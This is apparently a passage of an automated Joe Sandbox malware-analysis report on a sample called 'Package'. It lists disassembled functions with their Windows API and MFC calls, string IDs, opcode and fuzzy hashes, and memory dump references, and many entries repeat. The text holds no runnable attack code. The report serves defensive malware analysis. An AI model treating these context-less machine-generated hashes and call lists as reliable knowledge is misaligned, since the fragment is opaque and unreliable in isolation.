                                                                          • API ID: #567H_prolog3$#1008#489$#497#498#771Version
                                                                          • String ID:
                                                                          • API String ID: 3371278394-0
                                                                          • Opcode ID: 6ed4bbc7825ce99142c00a871bfe5b825f2ae2e31ded8ab09b3d703973c1c7d8
                                                                          • Instruction ID: 37d2593487a7e539b634eed533fd03da9b4f4812333482d34718ab05b52b4641
                                                                          • Opcode Fuzzy Hash: 6ed4bbc7825ce99142c00a871bfe5b825f2ae2e31ded8ab09b3d703973c1c7d8
                                                                          • Instruction Fuzzy Hash: 78017170E00219ABDB15FBB09896BECFB65EF94304F144059F408673C2CF746A08DAB1
                                                                          APIs
                                                                          • RegOpenKeyW.ADVAPI32(80000000,CLSID,?), ref: 00D35F63
                                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D35F9C
                                                                          • wsprintfW.USER32 ref: 00D35FD4
                                                                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00D35FF1
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D36006
                                                                          • RegQueryValueW.ADVAPI32(?,?,?,00000100), ref: 00D36202
                                                                          • wsprintfW.USER32 ref: 00D36231
                                                                          • #1083.MFC42U(?), ref: 00D362E2
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D36377
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenwsprintf$#1083EnumQueryValue
                                                                          • String ID: %s\Implemented Categories\%s$CLSID
                                                                          • API String ID: 2375140502-1315529758
                                                                          • Opcode ID: da28e54e90c36cf16f8b0fc81d76bc52f82c4645aa4079baf03b09ebcb495773
                                                                          • Instruction ID: 1ccd08e7584e2c16a52af2284b8c6629a40b570eb56f6277eea8066cef89946a
                                                                          • Opcode Fuzzy Hash: da28e54e90c36cf16f8b0fc81d76bc52f82c4645aa4079baf03b09ebcb495773
                                                                          • Instruction Fuzzy Hash: A611C571D08628AFEB21DB61DC44BA9B7BCFB18345F0480D9A50EE1150D779AB989F60
                                                                          APIs
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
                                                                          • #861.MFC42U(?), ref: 00D37EDA
                                                                          • RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$#861Close
                                                                          • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                          • API String ID: 1198224557-4222126835
                                                                          • Opcode ID: 0cb7212a38a5c3896d040803321f92cfd8244c54b4c37255f8dfddd8f853f31b
                                                                          • Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
                                                                          • Opcode Fuzzy Hash: 0cb7212a38a5c3896d040803321f92cfd8244c54b4c37255f8dfddd8f853f31b
                                                                          • Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30
                                                                          APIs
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
                                                                          • #861.MFC42U(?), ref: 00D37EDA
                                                                          • RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$#861Close
                                                                          • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                          • API String ID: 1198224557-4222126835
                                                                          • Opcode ID: bba1733d658b2f862231fe1460e83ba357e7538813688ce8dd2dad1f2cd17332
                                                                          • Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
                                                                          • Opcode Fuzzy Hash: bba1733d658b2f862231fe1460e83ba357e7538813688ce8dd2dad1f2cd17332
                                                                          • Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30
                                                                          APIs
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
                                                                          • #861.MFC42U(?), ref: 00D37EDA
                                                                          • RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$#861Close
                                                                          • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                          • API String ID: 1198224557-4222126835
                                                                          • Opcode ID: 219555578d4d0414cbaff31705040aa4f9b7b7b846abecd419c8832937797eef
                                                                          • Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
                                                                          • Opcode Fuzzy Hash: 219555578d4d0414cbaff31705040aa4f9b7b7b846abecd419c8832937797eef
                                                                          • Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30
                                                                          APIs
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap32,?,00000208), ref: 00D37E9A
                                                                          • RegQueryValueW.ADVAPI32(00000000,ToolboxBitmap,?,00000208), ref: 00D37EBD
                                                                          • #861.MFC42U(?), ref: 00D37EDA
                                                                          • RegCloseKey.ADVAPI32(00000000,?), ref: 00D37EEE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue$#861Close
                                                                          • String ID: ToolboxBitmap$ToolboxBitmap32
                                                                          • API String ID: 1198224557-4222126835
                                                                          • Opcode ID: fe9c38ab84a81da08a3c3959564f00052fd5b74c6f514e1177e4adf00036edda
                                                                          • Instruction ID: e112682a4cc2710f99e5744b49723494f3b2a3161d54a73c8ee62d58b58f2045
                                                                          • Opcode Fuzzy Hash: fe9c38ab84a81da08a3c3959564f00052fd5b74c6f514e1177e4adf00036edda
                                                                          • Instruction Fuzzy Hash: FF011BB694021D9FCB60DF10DC89BD973B8BF24305F0001E5A11AE2291DA709E84CF30
                                                                          APIs
                                                                          • #4704.MFC42U ref: 00D2C80D
                                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 00D2C838
                                                                          • SendMessageW.USER32(?,00001061,00000001,?), ref: 00D2C85C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$#4704
                                                                          • String ID: Can Access$User/Group$j
                                                                          • API String ID: 2927661609-2049629346
                                                                          • Opcode ID: c43f55d92c040860019ab13a19a718f18a42431e258fa40cd8b67f57ee2f8a4a
                                                                          • Instruction ID: c06b6a902e6f538506334dc86e73eec5f57bea859fac7fcf96bf0d24918d48ec
                                                                          • Opcode Fuzzy Hash: c43f55d92c040860019ab13a19a718f18a42431e258fa40cd8b67f57ee2f8a4a
                                                                          • Instruction Fuzzy Hash: CDF04F75900318AFEF109F95DC49FEFBBB9EB86714F10041AE901B6380C3B659458AB5
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2C969
                                                                          • #324.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C97A
                                                                          • #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C991
                                                                          • #567.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9AB
                                                                          • #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9C2
                                                                          • #540.MFC42U(00000085,00000000,00000008,00D2C91A,00000004), ref: 00D2C9D1
                                                                          • #861.MFC42U(00D221A0), ref: 00D2C9E8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #540#567$#324#861H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 4024192314-0
                                                                          • Opcode ID: cfaa7d447322a4eeecc7de5daf62a4b3ae7f2afcafd12602aecc5be280b03326
                                                                          • Instruction ID: e1bc7b20ced7f65914a23fefc97e111c87f549755917815cdb2b2ed679291a6f
                                                                          • Opcode Fuzzy Hash: cfaa7d447322a4eeecc7de5daf62a4b3ae7f2afcafd12602aecc5be280b03326
                                                                          • Instruction Fuzzy Hash: 8B017171A10657EBDB15EB6085063ADBBA0BF54704F504048E650273C2CBF41B08D7F2
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D393B6
                                                                          • #540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393C9
                                                                          • #540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393D5
                                                                          • #540.MFC42U(00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393E1
                                                                          • #858.MFC42U(?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393F0
                                                                          • #858.MFC42U(?,?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D393FB
                                                                          • #858.MFC42U(?,?,?,00000004,00D399BF,?,?,?,00000000,00000000), ref: 00D39406
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #540#858$H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 3210275551-0
                                                                          • Opcode ID: a1563ae13f566db38f11f540e6110c19dadefad6e89bb2d2cfcadbbde6770b0f
                                                                          • Instruction ID: 804092f9e721154ec87d40949ba23ea96faa2b49a8308f189703d769a23a5fe8
                                                                          • Opcode Fuzzy Hash: a1563ae13f566db38f11f540e6110c19dadefad6e89bb2d2cfcadbbde6770b0f
                                                                          • Instruction Fuzzy Hash: D2F0FF71500649DBCB14EF60D451B9EBBB2FF20715F00845CF5DA2A252DBB0AA18DB71
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D39420
                                                                          • #540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D39433
                                                                          • #540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D3943F
                                                                          • #540.MFC42U(00000004,00D3B222,?,?,TypeLib,?), ref: 00D3944B
                                                                          • #858.MFC42U(?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D3945A
                                                                          • #861.MFC42U(00D221A0,?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D39467
                                                                          • #858.MFC42U(?,00D221A0,?,00000004,00D3B222,?,?,TypeLib,?), ref: 00D39472
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #540$#858$#861H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 117671327-0
                                                                          • Opcode ID: a880bb6b05714a34d387ac31c8b0b0c004f0a0d5f92d670d991af4d9b78b6cb2
                                                                          • Instruction ID: c7162c78e927a5c8b98c8229d81bf134e4545d5da469fbdfd26e07957b00071b
                                                                          • Opcode Fuzzy Hash: a880bb6b05714a34d387ac31c8b0b0c004f0a0d5f92d670d991af4d9b78b6cb2
                                                                          • Instruction Fuzzy Hash: BEF0FF715006159BCB14EB60D452B99BBA1EF24715F00845CB5DA2A292DBB0AA18DB71
                                                                          APIs
                                                                          • #1662.MFC42U ref: 00D32B02
                                                                          • #5596.MFC42U ref: 00D32B2D
                                                                          • #5596.MFC42U ref: 00D32B45
                                                                          • #861.MFC42U(00D221A0,00000000,0000000D), ref: 00D32BB6
                                                                          • #6325.MFC42U(00000000,00000004,00000000,00D221A0,00000000,0000000D), ref: 00D32BC4
                                                                          • #2644.MFC42U ref: 00D32C14
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #5596$#1662#2644#6325#861
                                                                          • String ID:
                                                                          • API String ID: 4171677465-0
                                                                          • Opcode ID: 92d75334ca20d28c49a398d941eae355681f23a10bf4b6d214b1d77fae5b56bd
                                                                          • Instruction ID: 86993fccfc35953b13f9d0d8d3e2d83fddbedf2f779d0ac6d726f2f84c489e4b
                                                                          • Opcode Fuzzy Hash: 92d75334ca20d28c49a398d941eae355681f23a10bf4b6d214b1d77fae5b56bd
                                                                          • Instruction Fuzzy Hash: 6341CF74A01244EFDB54EFA4D956BADB7B1EF85314F104068E502AB3A2CB709E40CF71
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #5596$#1662#2644#6325#861
                                                                          • String ID:
                                                                          • API String ID: 4171677465-0
                                                                          • Opcode ID: 13d29a55c613bcf84f7cb871f450e58d5fa56a9f712ddb453e5388e52d2dcc62
                                                                          • Instruction ID: 41069cfdac115f3becdec474e6b21169988fa09fa2ba48b398b8089da477b68c
                                                                          • Opcode Fuzzy Hash: 13d29a55c613bcf84f7cb871f450e58d5fa56a9f712ddb453e5388e52d2dcc62
                                                                          • Instruction Fuzzy Hash: F7319C74A01645AFCB54FFA8D966BADB7B1EF85304F104164E502AB3A2DB70AE00DF71
                                                                          APIs
                                                                          • #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
                                                                          • #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5E8
                                                                          • #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E60B
                                                                          • #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E62E
                                                                          • #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E651
                                                                          • RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #6211$RedrawWindow
                                                                          • String ID:
                                                                          • API String ID: 4151937776-0
                                                                          • Opcode ID: c0cc7807b7885a534d4025d0eb20e68f4abd6c094d8b78e6b300cb49b7644123
                                                                          • Instruction ID: 3415ab75a94875909313d567f60c2c80a4508f85f63a355f10cad3d5db22b0fc
                                                                          • Opcode Fuzzy Hash: c0cc7807b7885a534d4025d0eb20e68f4abd6c094d8b78e6b300cb49b7644123
                                                                          • Instruction Fuzzy Hash: B1218E30010615BACF358E26EC08ED77B79EBB672AF05C92DF46A540A0D6759A44DF70
                                                                          APIs
                                                                          • free.MSVCRT ref: 00D3CD5F
                                                                          • free.MSVCRT ref: 00D3CD71
                                                                          • free.MSVCRT ref: 00D3CD83
                                                                          • free.MSVCRT ref: 00D3CD95
                                                                          • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,00D3CE02,00000000,00000000,00000000), ref: 00D3CDB7
                                                                          • GetLastError.KERNEL32(00000000), ref: 00D3CDC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: free$DescriptorErrorInitializeLastSecurity
                                                                          • String ID:
                                                                          • API String ID: 1417453991-0
                                                                          • Opcode ID: 266d13bf33fb7e24e48e761a9a57f46bfa46868f07766eb5baf1190ea15f0765
                                                                          • Instruction ID: 8defa3f5c7058d0b0b2459ee5b6332780b8d6131bdf9520e01fbf84f872d3479
                                                                          • Opcode Fuzzy Hash: 266d13bf33fb7e24e48e761a9a57f46bfa46868f07766eb5baf1190ea15f0765
                                                                          • Instruction Fuzzy Hash: 56117F36514B02CFC7305F65FC44652BBE1EF41321B2AA83EF1D6E6560CB348880CBA0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #1165ExtractIconQueryValuelstrcpylstrlenwcsrchr
                                                                          • String ID:
                                                                          • API String ID: 2919050075-0
                                                                          • Opcode ID: 83648ae63144c5ea2a3d4e5008631e80b6202848191d78570de432fa1e3061da
                                                                          • Instruction ID: c2ba20d5fd2103fede44b384ccb416d7d8d29ac2626e62d80436f29ebb1b1a9d
                                                                          • Opcode Fuzzy Hash: 83648ae63144c5ea2a3d4e5008631e80b6202848191d78570de432fa1e3061da
                                                                          • Instruction Fuzzy Hash: 3A218E769003189BCB20EF64EC49ADA77BDEF19314F104599F519D7191DB709A84CF70
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000001,?,6E2F1E31,6E2F163B,6E2F104E,?,6E2F1286,?,00000001,?,?,00000001,?,6E304520,0000000C,6E2F137F), ref: 6E2F236A
                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E2F2378
                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E2F2391
                                                                          • SetLastError.KERNEL32(00000000,6E2F1286,?,00000001,?,?,00000001,?,6E304520,0000000C,6E2F137F,?,00000001,?), ref: 6E2F23E3
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true
                                                                          • Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastValue___vcrt_
                                                                          • String ID:
                                                                          • API String ID: 3852720340-0
                                                                          • Opcode ID: be4c8407ddbdec5f53ed8a3f5dfae24ae6ffcd1b4c761f8054011e63827e8d9f
                                                                          • Instruction ID: 2a1896f180becc44bbb75a0d491d16296b0be4422812539845b948488bb74d65
                                                                          • Opcode Fuzzy Hash: be4c8407ddbdec5f53ed8a3f5dfae24ae6ffcd1b4c761f8054011e63827e8d9f
                                                                          • Instruction Fuzzy Hash: 1B01DEF71EDA5FEFA64405F46C84A4AA6AEEB0367A330022EF920821D8EF5148438350
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2F167
                                                                          • #3087.MFC42U(00001FA5,00000000), ref: 00D2F17D
                                                                          • #2634.MFC42U(00001FA5,00000000), ref: 00D2F184
                                                                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00D2F192
                                                                          • #3087.MFC42U(0000009C,00000000), ref: 00D2F1A8
                                                                          • #2634.MFC42U(0000009C,00000000), ref: 00D2F1AF
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #2634#3087MessageSend
                                                                          • String ID:
                                                                          • API String ID: 496076185-0
                                                                          • Opcode ID: 9dbf915d694336585cdace3e3f3b2a7842f2eb48af39a1128efbdaa912eacd34
                                                                          • Instruction ID: 47eba378d5d98c5a41f7804ea2153a03186ad2e7abdf790ced68e157a327f22c
                                                                          • Opcode Fuzzy Hash: 9dbf915d694336585cdace3e3f3b2a7842f2eb48af39a1128efbdaa912eacd34
                                                                          • Instruction Fuzzy Hash: 72F08CB6B103602BEB282B719C9AE2F6A9DDBC5B61F41042DB106C61E0DEB55D418275
                                                                          APIs
                                                                          • __EH_prolog3.LIBCMT ref: 00D2C4BD
                                                                          • #324.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4CE
                                                                          • #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C4E5
                                                                          • #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C500
                                                                          • #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C516
                                                                          • #567.MFC42U(00000088,00000000,00000008,00D2BFBA,00000004), ref: 00D2C52C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true
                                                                          • Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_d20000_Package.jbxd
                                                                          Similarity
                                                                          • API ID: #567$#324H_prolog3
                                                                          • String ID:
                                                                          • API String ID: 3217428371-0
                                                                          • Opcode ID: c69b1c8699b7fb16e12a4e5060d7ce0d81bcaa560ddfd0122e5bc8817890af49
                                                                          • Instruction ID: 82f8b34cb923cb4ff15cc1c882f4cc5e1ea4772d9f741900fb8afc71c1c830e3
                                                                          • Opcode Fuzzy Hash: c69b1c8699b7fb16e12a4e5060d7ce0d81bcaa560ddfd0122e5bc8817890af49
                                                                          • Instruction Fuzzy Hash: E201E971A0126ADBDB059F9489023ECBBA0AF55700F60405EE58077381CBB41B05CBF6
                                                                          APIs
                                                                          • #693.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A85
                                                                          • #609.MFC42U(?,00D2D810,?,00D2D83D), ref: 00D30A90
